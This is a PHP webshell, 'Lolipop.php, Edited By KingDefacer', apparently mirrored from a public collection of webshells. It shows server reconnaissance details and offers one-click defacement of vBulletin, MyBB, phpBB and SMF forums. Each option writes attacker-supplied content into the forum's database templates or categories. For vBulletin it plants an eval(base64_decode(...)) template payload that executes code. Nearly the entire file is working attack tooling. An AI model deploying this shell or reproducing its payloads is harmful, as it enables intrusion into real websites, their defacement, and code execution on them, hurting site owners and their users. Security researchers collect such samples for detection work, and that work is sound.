mirror of
https://github.com/BlackArch/webshells
synced 2024-11-22 11:53:05 +00:00
288 lines
13 KiB
PHP
288 lines
13 KiB
PHP
<p align="right"></p><body bgcolor="#FFFFFF">
|
|
<?php
|
|
|
|
######################## Begining of Coding ;) ######################
|
|
error_reporting(0);
|
|
|
|
$info = $_SERVER['SERVER_SOFTWARE'];
|
|
$site = getenv("HTTP_HOST");
|
|
$page = $_SERVER['SCRIPT_NAME'];
|
|
$sname = $_SERVER['SERVER_NAME'];
|
|
$uname = php_uname();
|
|
$smod = ini_get('safe_mode');
|
|
$disfunc = ini_get('disable_functions');
|
|
$yourip = $_SERVER['REMOTE_ADDR'];
|
|
$serverip = $_SERVER['SERVER_ADDR'];
|
|
$version = phpversion();
|
|
$ccc = realpath($_GET['chdir'])."/";
|
|
$fdel = $_GET['fdel'];
|
|
$execute = $_POST['execute'];
|
|
$cmd = $_POST['cmd'];
|
|
$commander = $_POST['commander'];
|
|
$ls = "ls -la";
|
|
$source = $_POST['source'];
|
|
$gomkf = $_POST['gomkf'];
|
|
$title = $_POST['title'];
|
|
$sourcego = $_POST['sourcego'];
|
|
$ftemp = "tmp";
|
|
$temp = tempnam($ftemp, "cx");
|
|
$fcopy = $_POST['fcopy'];
|
|
$tuser = $_POST['tuser'];
|
|
$user = $_POST['user'];
|
|
$wdir = $_POST['wdir'];
|
|
$tdir = $_POST['tdir'];
|
|
$symgo = $_POST['symgo'];
|
|
$sym = "xhackers.txt";
|
|
$to = $_POST['to'];
|
|
$sbjct = $_POST['sbjct'];
|
|
$msg = $_POST['msg'];
|
|
$header = "From:".$_POST['header'];
|
|
|
|
|
|
//PHPinfo
|
|
|
|
if(isset($_POST['phpinfo']))
|
|
{
|
|
die(phpinfo());
|
|
}
|
|
//Guvenli mod vs vs
|
|
if ($smod)
|
|
{
|
|
$c_h = "<font color=red face='Verdana' size='1'>ON</font>";
|
|
}
|
|
else
|
|
{
|
|
$c_h = "<font face='Verdana' size='1' color=green>OFF</font>";
|
|
}
|
|
|
|
//Kapali Fonksiyonlar
|
|
if (''==($disfunc))
|
|
{
|
|
$dis = "<font color=green>None</font>";
|
|
}
|
|
else
|
|
{
|
|
$dis = "<font color=red>$disfunc</font>";
|
|
}
|
|
//Dizin degisimi
|
|
if(isset($_GET['dir']) && is_dir($_GET['dir']))
|
|
{
|
|
chdir($_GET['dir']);
|
|
}
|
|
|
|
$ccc = realpath($_GET['chdir'])."/";
|
|
|
|
//Baslik
|
|
echo "<head>
|
|
<style>
|
|
body { font-size: 12px;
|
|
|
|
font-family: arial, helvetica;
|
|
|
|
scrollbar-width: 5;
|
|
|
|
scrollbar-height: 5;
|
|
|
|
scrollbar-face-color: black;
|
|
|
|
scrollbar-shadow-color: silver;
|
|
|
|
scrollbar-highlight-color: silver;
|
|
|
|
scrollbar-3dlight-color:silver;
|
|
|
|
scrollbar-darkshadow-color: silver;
|
|
|
|
scrollbar-track-color: black;
|
|
|
|
scrollbar-arrow-color: silver;
|
|
|
|
}
|
|
</style>
|
|
|
|
<title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>";
|
|
//Ana tablo
|
|
echo "<body text='#FFFFFF'>
|
|
<table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'>
|
|
<tr>
|
|
<td><font color='#000000'>
|
|
|
|
|
|
<font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font>
|
|
|
|
</tr>
|
|
<tr>
|
|
<td style='border: 1px solid #333333'>
|
|
<font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td>
|
|
</tr>
|
|
</table>";
|
|
echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr>
|
|
';
|
|
//Buton Listesi
|
|
echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center>";
|
|
|
|
|
|
|
|
|
|
//VB HACK
|
|
if (isset($_POST['vbulletin']))
|
|
{
|
|
echo "<center><table border=0 width='100%'>
|
|
<tr><td>
|
|
<center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center>
|
|
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
|
|
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
|
|
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
|
|
die();
|
|
}
|
|
$KingDefacer="Powered By Lolipop :))";
|
|
$dbh = $_POST['dbh'];
|
|
$dbu = $_POST['dbu'];
|
|
$dbn = $_POST['dbn'];
|
|
$dbp = $_POST['dbp'];
|
|
$index = $_POST['index'];
|
|
$index=str_replace("\'","'",$index);
|
|
$set_index = "{\${eval(base64_decode(\'";
|
|
|
|
$set_index .= base64_encode("echo \"$index\";");
|
|
|
|
|
|
$set_index .= "\'))}}{\${exit()}}</textarea>";
|
|
|
|
|
|
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
|
|
{
|
|
mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
|
|
mysql_select_db($dbn) or die(mysql_error());
|
|
$loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'";
|
|
$loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'";
|
|
$loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''";
|
|
$result = mysql_query($loli1) or die (mysql_error());
|
|
$result = mysql_query($loli2) or die (mysql_error());
|
|
$result = mysql_query($loli3) or die (mysql_error());
|
|
echo "<script>alert('Vb Hacked');</script>";
|
|
}
|
|
|
|
//MyBB Hack
|
|
if (isset($_POST['mybulletin']))
|
|
{
|
|
echo "<center><table border=0 width='100%'>
|
|
<tr><td>
|
|
<center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center>
|
|
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br>
|
|
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
|
|
die();
|
|
}
|
|
$mybb_dbh = $_POST['mybbdbh'];
|
|
$mybb_dbu = $_POST['mybbdbu'];
|
|
$mybb_dbn = $_POST['mybbdbn'];
|
|
$mybb_dbp = $_POST['mybbdbp'];
|
|
$mybb_index = $_POST['mybbindex'];
|
|
|
|
if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index))
|
|
{
|
|
mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error());
|
|
mysql_select_db($mybb_dbn) or die(mysql_error());
|
|
$prefix="mybb_";
|
|
$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
|
|
|
|
$result = mysql_query($loli7) or die (mysql_error());
|
|
|
|
echo "<script>alert('MyBB Hacked');</script>";
|
|
}
|
|
//PhpBB
|
|
if (isset($_POST['phpbb']))
|
|
{
|
|
echo "<center><table border=0 width='100%'>
|
|
<tr><td>
|
|
<center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center>
|
|
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Yazi Veya KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
|
|
die();
|
|
}
|
|
$phpbb_dbh = $_POST['phpbbdbh'];
|
|
$phpbb_dbu = $_POST['phpbbdbu'];
|
|
$phpbb_dbn = $_POST['phpbbdbn'];
|
|
$phpbb_dbp = $_POST['phpbbdbp'];
|
|
$phpbb_kat = $_POST['phpbbkat'];
|
|
$kategoriid=$_POST['katid'];
|
|
|
|
if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat))
|
|
{
|
|
mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error());
|
|
mysql_select_db($phpbb_dbn) or die(mysql_error());
|
|
|
|
|
|
$loli10 = "UPDATE phpbb_categories SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'";
|
|
|
|
$result = mysql_query($loli10) or die (mysql_error());
|
|
|
|
echo "<script>alert('PhpBB Hacked');</script>";
|
|
}
|
|
//SmfHACK
|
|
if (isset($_POST['smf']))
|
|
{
|
|
echo "<center><table border=0 width='100%'>
|
|
<tr><td>
|
|
<center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center>
|
|
<center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
<font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br>
|
|
|
|
<input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>";
|
|
die();
|
|
}
|
|
$smf_dbh = $_POST['smfdbh'];
|
|
$smf_dbu = $_POST['smfdbu'];
|
|
$smf_dbn = $_POST['smfdbn'];
|
|
$smf_dbp = $_POST['smfdbp'];
|
|
$smf_index = $_POST['smf_index'];
|
|
$smf_katid=$_POST['katid'];
|
|
|
|
if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index))
|
|
{
|
|
mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error());
|
|
mysql_select_db($smf_dbn) or die(mysql_error());
|
|
$prefix="smf_";
|
|
$loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'";
|
|
|
|
$result = mysql_query($loli12) or die (mysql_error());
|
|
|
|
echo "<script>alert('smf Hacked');</script>";
|
|
}
|
|
|
|
|
|
//Alt taraf
|
|
echo "
|
|
|
|
|
|
<br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'>
|
|
<tr>
|
|
<td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'>
|
|
|
|
<p><strong>Lolipop.php</strong></p>
|
|
<p><strong>Edited By KingDefacer</strong></p>
|
|
<p><strong></strong><br>
|
|
</p></td>
|
|
</tr></table>";
|
|
|
|
|
|
|
|
// Kod bitisi
|
|
?>
|